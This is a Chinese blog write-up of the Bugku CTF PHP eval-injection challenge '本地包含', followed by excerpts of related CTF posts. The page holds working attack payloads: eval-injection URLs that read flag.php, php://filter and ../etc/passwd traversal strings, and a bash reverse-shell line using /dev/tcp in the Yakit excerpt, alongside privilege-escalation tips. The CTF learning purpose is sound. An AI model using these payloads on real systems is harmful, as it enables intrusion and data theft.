bugku本地包含

最新推荐文章于 2024-10-23 22:06:36 发布
原创 最新推荐文章于 2024-10-23 22:06:36 发布 · 957 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客围绕bugku本地包含题目展开,先进行代码分析,介绍了include、$_REQUEST、var_dump、eval等语句和函数的作用。接着给出两种解题方法,方法一涉及eval函数将字符串作为语句运行,方法二提到file函数把文件读入数组。

bugku本地包含

题目链接

页面提示:

<?php 
    include "flag.php"; 
    $a = @$_REQUEST['hello']; 
    eval( "var_dump($a);"); 
    show_source(__FILE__); 
?>

代码分析

  1. include “flag.php”: include 语句包含并运行指定文件。
  2. $_REQUEST[‘hello’]: 通过 GET,POST 和 COOKIE 传递参数
  3. var_dump($a) : 输出变量的相关信息
  4. eval(): 把字符串当作命令直接执行
  5. show_source() : 函数对文件进行语法高亮显示。
  6. FILE: 当前文件

方法一:

http://123.206.87.240:8003/?hello=1);print_r(file(%22./flag.php%22));//

相当于:eval( “var_dump(1);print_r(file(”./flag.php"));//);");
eval函数将引号内的字符串作为语句运行,所以//仅注释);

方法二:

http://123.206.87.240:8003/?hello=file('flag.php')

file() 函数把整个文件读入一个数组中。(注意参数是字符串)

BugkuCTF-WEB-本地包含
Jaychouzzk
11-15 627
题目提示,需要将flag.php包含进去才可以得到flag 百度了一下$_REQUEST函数,发现易存在sql漏洞和变量漏洞覆盖 第二句话要获得hello的值,由于hello为’hello’,所以无论在url栏中对hello赋任何值,都会全盘接受,其中var_dump()是将变量a打印到界面中,在根据eval函数的特性(计算后面括号中的表达式) SO——   (1)a变量由$_REQU...
BugKu_文件包含
Kobalos的博客
08-06 447
直接访问目标地址 发现有一个跳转链接,点击尝试,发现跳转到/index.php?file=show.php 看他的url还有题目名字,确定这里应该就是文件包含的漏洞点了 CTF中经常使用的是php://filter和php://input php://filter 用于读取源码 php://input 用于执行php代码 php://filter/read=convert.base64-encode/resource=[文件名] 用于读取文件.
BugkuWEB
qq_45946385的博客
07-29 294
这里写目录标题1.web22.计算器3.web基础$_GET4.web基础$_POST5.矛盾6.web37.域名解析8.你必须让他停下9.本地包含10.变量111.web5 1.web2 源代码 KEY{Web-2-bugKssNNikls9100} 2.计算器 字数限制了改一下我改成10了 flag{CTF-bugku-0032} 3.web基础$_GET 直接改?what=flag fl...
Bugku——本地管理员
weixin_71914594的博客
10-17 1175
Bugku——本地管理员
Bugku CTF_Web——程序员本地网站
weixin_71914594的博客
10-23 480
进入题目老规矩先F12看看。把包丢入repeater里。题目叫“程序员本地网站”会会还是XFF伪造漏洞。扫了半天目录啥也没发现。再将伪造的xxf放进去。那就继续扫扫目录看看。简简单单flag到手。
bugku baby lfi 2一题引入LFI漏洞(本地文件包含
2301_76690905的博客
10-25 1455
"./" 的作用是将文件路径 "./languages/../../../../../../etc/passwd" 解释为相对于当前工作目录的路径。我们的目标是要包含到/etc/passwd,那显而易见需要我们跳到根目录再进行包含,这里试了../../../../../etc/passwd提示合法,那我们先访问当前目录下的languages再尝试跳回根目录,再去访问我们的目标。根据选择语言的提示,我们的参数名可能是language,尝试了file,language作为参数名后确定传参给language。
bugku-web12-本地管理员
weixin_50774579的博客
05-24 1615
1.查看源代码发现了线索,base64解码得到字符串‘test123' 2.管理员默认账号admin,密码test123,登录,提示IP禁止访问,请联系本地管理员登陆,IP已被记录. burp拦截,发到repeater, 添加http头X-Forwarded-For: 127.0.0.1,即可 也可以用hackbar直接在浏览器上完成,这个比较简单。 要注意!X-Forwarded-For: 127.0.0.1(IP前面要有一个空格) base64解码+XFF伪造请求头 知识点:以...
CTF之Bugku 本地包含
weixin_41607190的博客
10-04 264
原理:利用eval()函数的执行漏洞,过滤参数执行我们提交的结果 我们提交的结果被执行之后,可以爆出网站后台文件得到flag 转载: https://blog.youkuaiyun.com/xuchen16/article/details/82734758 ...
bugku 本地包含(file函数,eval)
wssmiss的博客
07-21 835
本地包含 eval 参数有注入点,构造 hello=file(“flag.php”) 拿到falg! file() 函数把整个文件读入一个数组中。 与 file_get_contents() 类似,同的是 file() 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换行符在内。如果失败,则返回 false。 file(path,include_path,context) ...
bugku ctf 本地包含
qq_42777804的博客
04-16 792
地址:http://123.206.87.240:8003/ 打开之后 发现是一段php代码 百度搜了一下$_REQUEST PHP$_REQUEST是用于收集HTML表单提交的数据,PHP$_REQUEST属于PHP的超级全局变量。 应该是获得参数吧 所以构造hello的get参数 然后搜了一下各种函数的用途 eval() 函数存在命令执行漏洞,构造...
Bugkuweb本地包含(wp)
我还在的博客
10-29 2188
0x00 前言 这是Bugkuweb中的一道名为本地包含的题目。考察对PHP的知识。 0x01 解题过程 打开链接,你会看到一段PHP代码。 分析这段代码,最终得到攻击思路:通过构造名字为hello的攻击命令,把flag.php里面的代码以数组形式输出出来。 回车,则会看到flag ...
BUGKU_(本地包含+成绩单)
qq_44832048的博客
10-27 265
本地包含 在网页中新建标签页打开链接后出现以下一些PHP代码, include “flag.php” 包含flag。。。 下面解析这段代码: request这个变量和_request这个变量和r​equest这个变量和_GET、$_POST一样,都属于超级全局变量,运行时修改后者会影响前者,修改后者会影响前者。在这里可以以get/post/cookies等方式把以hello为名的东西提交过来 ...
bugku 文件包含
weixin_74020633的博客
09-27 412
点击后,跳转到一个index页面,并且url后有flag=show.php,根据搜索知道这是典型的文件包含问题(虽然这里题目提示是文件包含了)之后尝试改为flag=index,发现对。在开发过程中,当频繁需要跳转网页,或者需要某个函数时,程序员喜欢将重复的函数写道一个单独的文件中,在需要时调用文件,这种文件调用叫做文件包含。当调用的是函数,而是一个文件时,就相当于把这个文件变了变量,也就给了用户操控参数的机会,就可能造成文件包含漏洞。通常获取源代码时,伪协议将xxx.php当文件执行,
Bugku之文件包含
金 帛的博客
02-15 920
BugkuWP
bugku文件包含
qq_62046696的博客
04-30 1126
因为时文件包含的题目,首先尝试一下file=index.php,发现出现了报错信息。然后考虑用伪协议绕过一下 1.file=php://input仍然出现了报错信息,然后用一下其他的伪协议 2.file=php://filter/read=convert.base64-encode/resource=./index.php 得到base64加密的编码,通过base64解码就可以获取flag ...
Bugku-文件包含
qq_56611811的博客
05-16 329
得到flag{f285b417425153e41a60b28032c76395}file=show.php。试试能能回到上级目录。
用yakit 做bugku里面的本地管理员
最新发布
07-08
Bugku CTF 的“本地管理员”题目中,通常的目标是获取系统的管理员权限或读取特定文件(如 flag)。Yakit 是一个功能强大的安全测试工具,集成了代理、扫描、插件系统等功能,适合用于漏洞挖掘和利用。 以下是使用 Yakit 解决 Bugku CTF 中“本地管理员”题目的基本思路和操作方法: ### 1. 分析题目环境 首先需要确认题目的运行环境。如果是 Web 类题目,通常是通过网页访问目标服务,可能存在命令注入、文件包含、弱口令登录等漏洞。Yakit 可以帮助拦截请求、修改参数并发送恶意载荷。 - 使用 Yakit 的 **HTTP History** 功能记录所有 HTTP 请求。 - 利用 **MITM** 模块进行中间人攻击,分析数据包内容。 ### 2. 尝试常见漏洞利用方式 #### 命令注入 如果存在用户输入被当作系统命令执行的情况,可以尝试构造特殊命令来获取信息或执行任意代码。 例如,在输入框中提交以下内容: ```bash whoami ``` 观察返回结果是否显示当前用户身份。若成功执行,说明存在命令注入漏洞。此时可进一步尝试反弹 shell 或读取敏感文件。 #### 文件读取漏洞 部分题目可能允许通过路径遍历等方式读取服务器上的文件。例如: ```bash ../../../../etc/passwd ``` 在 Yakit 的 **Web Fuzzer** 模块中设置 payload 并发起请求,尝试读取 `/etc/passwd` 等文件内容。 ### 3. 使用 Yakit 插件进行自动化检测 Yakit 支持丰富的插件系统,可以通过内置插件自动检测 SQL 注入、XSS、命令注入等漏洞。 - 在 Yakit 主界面点击 **Plugins**,选择合适的插件。 - 输入目标 URL 后启动扫描,等待插件输出检测结果。 ### 4. 获取 Shell 并提升权限 一旦发现可执行命令的点,可以尝试生成 reverse shell 脚本并发送到目标服务器。 例如,使用如下 Bash 命令建立反向连接: ```bash bash -c 'exec bash -i &>/dev/tcp/your_ip/your_port <&1' ``` 在 Yakit 的 **Port Scan** 或 **Reverse Shell Generator** 工具中配置监听地址和端口,等待目标回连。 ### 5. 提权与读取 Flag 成功获取低权限 shell 后,下一步是提权至 root 或 administrator。常见的提权方式包括: - 利用内核漏洞(如 Dirty COW)。 - 修改 SUID 二进制文件。 - 利用定时任务或服务漏洞。 最终通过提权获得管理员权限后,使用 `cat /flag` 或类似命令读取 flag 内容。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值